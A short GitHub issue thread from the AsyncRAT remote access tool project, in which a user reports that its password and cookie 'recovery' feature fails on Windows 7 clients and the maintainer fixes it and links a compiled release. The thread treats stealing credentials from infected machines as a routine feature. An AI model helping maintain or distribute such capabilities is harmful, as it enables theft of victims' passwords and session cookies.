### ISSUE TITLE
Passwords/Cookie feature error

### ISSUE THREAD

**Issue by enkianu** [NYAN-x-CAT/AsyncRAT-C-Sharp#38]
In reference to issue #35 , I've noticed that the password and cookie recovery feature gives an "exception" error. 

So far, I've only noticed this on clients running windows 7 32bit and 64bit

**Comment by NYAN-x-CAT** [comment]
I will update the recovery to work with windows 7.

**Comment by enkianu** [comment]
Kudos to you and the team

**Comment by NYAN-x-CAT** [comment]
Fixed. I updated the compiled version. You can download it

https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/releases/tag/v0.4.9C

**Comment by enkianu** [comment]
Ok... that's great
